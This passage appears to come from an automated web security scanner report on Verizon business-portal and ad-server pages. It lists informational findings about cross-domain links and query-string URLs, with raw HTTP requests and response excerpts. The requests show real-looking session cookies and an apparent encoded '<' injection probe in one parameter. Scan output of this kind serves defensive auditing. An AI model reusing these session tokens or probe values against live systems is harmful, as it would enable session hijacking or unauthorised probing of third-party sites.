...[SNIP]...
<input type=hidden name="WT.mc_ev" value="click" />
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20>
           <table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width=219>
                       <img src=http://s0.2mdn.net/836848/0806_inc_logo_red.gif><br>
...[SNIP]...
<a href=submit onClick="fcheck('fhotel', 'slice1:dateTime:date', 'slice2:dateTime:date'); return false;"><img src=http://s0.2mdn.net/836848/0806_inc_search_red.gif border=0></a>
...[SNIP]...
<td width=5 bgcolor=#ffffff><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=196><br>
...[SNIP]...
<td width=285 valign=top bgcolor=#ffffff>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
<span class=small><a href=http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp target=_blank onClick="return maxPopUp()">(up to 4)</a>
...[SNIP]...
<input type=hidden name="WT.mc_ev" value="click" />
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20>
           <table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width=219>
                       <img src=http://s0.2mdn.net/836848/0806_inc_logo_red.gif><br>
...[SNIP]...
<a href=submit onClick="fcheck('fhc', 'slice1:dateTime:date', 'slice2:dateTime:date'); return false;"><img src=http://s0.2mdn.net/836848/0806_inc_search_red.gif border=0></a>
...[SNIP]...

15.2. http://ad.doubleclick.net/adj/syn.verizon/news_read_atf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/syn.verizon/news_read_atf

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/syn.verizon/news_read_atf;tile=1;sz=300x250;postalcode=%3C[token= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 5212
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:42:46 GMT
Expires: Mon, 05 Sep 2011 22:42:46 GMT

var divid='dclkAdsDivID_7488';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_7488 = "<!doctype html><html><head><style><!--\na:link { color: #000000 }a:visited { color: #000000 }a:ho
...[SNIP]...
zon.com/headlines/portals/headlines.portal%26hl%3Den%26client%3Dca-pub-9242135695870166%26adU%3Dwww.Unitek.com/CCNP%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNE5f8XAlkmkGDEZFWzOlaOweqXNKw\" target=_blank><img alt=\"AdChoices\" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...

15.3. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 114209
Expires: Mon, 05 Sep 2011 22:35:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:35:52 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Small Busin
...[SNIP]...
<td style="padding-top:10px;padding-left: 5px; padding-right: 5px;">

               <img src="http://publish.vx.roo.com/thumbnails/1223/996064_3.jpg" alt="" border="0" height="50" width="50"/>

           </td>
...[SNIP]...
<td style="padding-top:10px;padding-left: 5px; padding-right: 5px;">

               <img src="http://player.kamera.com/kit-vx-jpg/afp/2417122_Cubansslowly_20110902-120x90.jpg" alt="" border="0" height="50" width="50"/>

           </td>
...[SNIP]...
<td style="padding-top:10px;padding-left: 5px; padding-right: 5px;">

               <img src="http://player.kamera.com/kit-vx-jpg/afp/2414736_Prisonersabused_20110902-120x90.jpg" alt="" border="0" height="50" width="50"/>

           </td>
...[SNIP]...
<li><a href="http://b2b.vzw.com" onclick="dcsExit('http://b2b.vzw.com','Verizon Wireless');return false;" title="Verizon Wireless" target="_blank" >Verizon Wireless</a>
...[SNIP]...

15.4. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&newsId=48291&portletTitle=Small%20Business%20Expert%20Advice&FromHeroTab=article&Headline=Five%20Powerful%20Lists%20to%20Help%20You%20Take%20Command%20of%20Your%20Work%20Life HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 90875
Expires: Mon, 05 Sep 2011 22:36:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:36:03 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
<br>
Tada list: <a target="_blank" href="http://tadalist.com/">http://tadalist.com</a><br>
Remember the Milk: <a target="_blank" href="http://www.rememberthemilk.com/">http://www.rememberthemilk.com</a>
...[SNIP]...
<br>
Tada list: <a target="_blank" href="http://tadalist.com/">http://tadalist.com</a><br>
Remember the Milk: <a target="_blank" href="http://www.rememberthemilk.com/">http://www.rememberthemilk.com</a>
...[SNIP]...
<li><a href="http://b2b.vzw.com" onclick="dcsExit('http://b2b.vzw.com','Verizon Wireless');return false;" title="Verizon Wireless" target="_blank" >Verizon Wireless</a>
...[SNIP]...

15.5. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBPortal_portlet_news_ins_federatedMediaBlog&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Small+Business+Expert+Advice&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 11209
Expires: Mon, 05 Sep 2011 22:35:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:35:55 GMT
Connection: close
Vary: Accept-Encoding

<div class="&#xFF3F;bea-wlp-disc-context-hook" id="7468656d655f745f31343334303038"><div class="wlp-bighorn-theme wlp-bighorn-theme-SMB_PortletGray_Border"><div class="&#xFF3F;bea-wlp-disc-context-hook
...[SNIP]...
<!-- Web site URL where tag should be placed: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb
                                                           ?_nfpb=true&_pageLabel=SMBPortal_page_main_newsandresources -->

       <iframe src="http://fls.doubleclick.net/activityi;src=1475931;type=busin689;cat=newsa995;ord="+4.4859366677555524E11+"?"
               width="1" height="1" frameborder="0" style="display:none">
</iframe>
...[SNIP]...

15.6. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBPortal_portlet_ovrvw_inst_businessNews&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Business+News&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 10168
Expires: Mon, 05 Sep 2011 22:35:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:35:56 GMT
Connection: close
Vary: Accept-Encoding

<div class="&#xFF3F;bea-wlp-disc-context-hook" id="7468656d655f745f31343334303036"><div class="wlp-bighorn-theme wlp-bighorn-theme-SMB_PortletGray_Border"><div class="&#xFF3F;bea-wlp-disc-context-hook
...[SNIP]...
</span>

                                   <a style="font-size:10pt;" target="_blank" href="http://www.nytimes.com/aponline/2011/09/05/business/AP-EU-Netherlands-Hacking-Incident.html?partner=VERIZON&ei=5115"
                                    onclick="dcsClick('EX_NewsAndResources_Business News OpenThirdPartyURL','Third Party The New York Times Link')"
                                    title="Experts Suspect Iran Involvement in Dutch Hacking">

                                       Experts Suspect Iran Involvement...
                                   </a>
...[SNIP]...
<td valign="top" style="padding-top:5px;padding-bottom:1px;padding-right:5px;padding-left:5px;" >

                   <img src=http://graphics.nytimes.com/images/2011/09/06/sports/football/06giants-pic/06giants-pic-articleInline.jpg title="New York Times" alt="" border="0" height="50" width="50"/>

               </td>
...[SNIP]...
</span>

                                   <a style="font-size:10pt;" target="_blank" href="http://www.nytimes.com/2011/09/06/sports/football/giants-eli-manning-searching-for-comfort-zone-with-new-center.html?partner=VERIZON&ei=5115"
                                    onclick="dcsClick('EX_NewsAndResources_Business News OpenThirdPartyURL','Third Party The New York Times Link')"
                                    title="New Center, and New Relationship, for Manning">

                                       New Center, and New Relationship,...
                                   </a>
...[SNIP]...
<td valign="top" style="padding-top:5px;padding-bottom:1px;padding-right:5px;padding-left:5px;" >

                   <img src=http://graphics.nytimes.com/images/2011/09/06/sports/tennis/06day-pic-2/06day-pic-2-articleInline.jpg title="New York Times" alt="" border="0" height="50" width="50"/>

               </td>
...[SNIP]...
</span>

                                   <a style="font-size:10pt;" target="_blank" href="http://www.nytimes.com/2011/09/06/sports/tennis/2011-us-open-day-8.html?partner=VERIZON&ei=5115"
                                    onclick="dcsClick('EX_NewsAndResources_Business News OpenThirdPartyURL','Third Party The New York Times Link')"
                                    title="Serena Williams Powers Into Quarterfinals">

                                       Serena Williams Powers Into...
                                   </a>
...[SNIP]...

15.7. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_quicklinks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_quicklinks

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_quicklinks?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBProtal_portlet_hiddenNews_articleDetails_quicklinks&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&_portlet.title=Quick+Links&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&newsId=48291&portletTitle=Small%20Business%20Expert%20Advice&FromHeroTab=article&Headline=Five%20Powerful%20Lists%20to%20Help%20You%20Take%20Command%20of%20Your%20Work%20Life
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269365057:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9835
Expires: Mon, 05 Sep 2011 22:36:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:36:08 GMT
Connection: close
Vary: Accept-Encoding

<div class="&#xFF3F;bea-wlp-disc-context-hook" id="7468656d655f745f31343334323438"><div class="wlp-bighorn-theme wlp-bighorn-theme-SMB_PortletGray_Border"><div class="&#xFF3F;bea-wlp-disc-context-hook
...[SNIP]...
<li><a href="https://email.vzwshop.com/servlet/website/ResponseForm?OSPE8b6_vimpg_zf8_9httNgpmR"
target="_blank" title="Keep up with mobile products for your business." onclick="dcsClick('EV_QuickLinks_Sign_Up_for_Wireless_Email_Updates','Displays Sign Up for Wireless Email Updates');">
Sign Up for Wireless Email Updates</a>
...[SNIP]...
<li><a href="https://email.vzwshop.com/servlet/website/ResponseForm?OSPE8b6_vimpg_zf8_9httNgpmR"
target="_blank" title="Keep up with mobile products for your business." onclick="dcsClick('EV_QuickLinks_Sign_Up_for_Wireless_Email_Updates','Displays Sign Up for Wireless Email Updates');">
Sign Up for Wireless Email Updates</a>
...[SNIP]...

15.8. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_supportHelp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_supportHelp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_supportHelp?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBProtal_portlet_hiddenNews_articleDetails_supportHelp&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&_portlet.title=How+can+we+help+you%3F&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&newsId=48291&portletTitle=Small%20Business%20Expert%20Advice&FromHeroTab=article&Headline=Five%20Powerful%20Lists%20to%20Help%20You%20Take%20Command%20of%20Your%20Work%20Life
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269365057:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 6676
Expires: Mon, 05 Sep 2011 22:36:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:36:09 GMT
Connection: close
Vary: Accept-Encoding

<div class="&#xFF3F;bea-wlp-disc-context-hook" id="7468656d655f745f31343334323439"><div class="wlp-bighorn-theme wlp-bighorn-theme-SMB_PortletGray_Border"><div class="&#xFF3F;bea-wlp-disc-context-hook
...[SNIP]...
<td style="padding-top: 5px; padding-left: 4px; padding-bottom: 4px;" class="AltTblTd_spt">
<a href="http://www.verizonwireless.com/b2c/businessSolutions/contactUs.jsp" target="_blank" onclick="dcsClick('EV_Overview_Help_Wireless_Sales_Icon','Goes to VZ Wireless Business Solutions Page');">
<img src="/SMBPortalWeb/images/icon_callus_sm.gif" />
...[SNIP]...
<td style="padding-top: 15px; padding-left: 3px;" class="AltTblTd_spt">
Contact a <a href="http://www.verizonwireless.com/b2c/businessSolutions/contactUs.jsp"
target="_blank" onclick="dcsClick('EV_Overview_Help_Wireless_Sales_Text','Goes to VZ Wireless Business Solutions Page');">
Wireless Sales Representative</a>
...[SNIP]...

15.9. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=VerizonDiscountProgram_2&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Verizon+Discount+Program&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 4784
Expires: Mon, 05 Sep 2011 22:35:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:35:58 GMT
Connection: close
Vary: Accept-Encoding

<div class="&#xFF3F;bea-wlp-disc-context-hook" id="7468656d655f745f31343334303135"><div class="wlp-bighorn-theme wlp-bighorn-theme-SMB_PortletGray_Border"><div class="&#xFF3F;bea-wlp-disc-context-hook
...[SNIP]...
<td><a title="WebEx PCNow" onclick="dcsClick('EV_Floating_PromoBox_VDP_WebEx','Goes to VDP WebEx Site');" href="https://pcnowverizon.webex.com/MyWebExWeb/MyWebexPortal.portal" target="_blank"><img alt="WebEx PCNow" align="center" src="/SMBPortalWeb/images/vdpicon_webex.gif" />
...[SNIP]...
<td><a title="Logo Mojo" onclick="dcsClick('EV_Floating_PromoBox_VDP_Logo_Mojo','Goes to VDP Logo Mogo Page');" href="http://www.deluxelogodesign.com/verizon" target="_blank"><img alt="Logo Mojo" align="center" src="/SMBPortalWeb/images/vdpicon_logomojo.jpg" />
...[SNIP]...

15.10. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://business.verizon.net
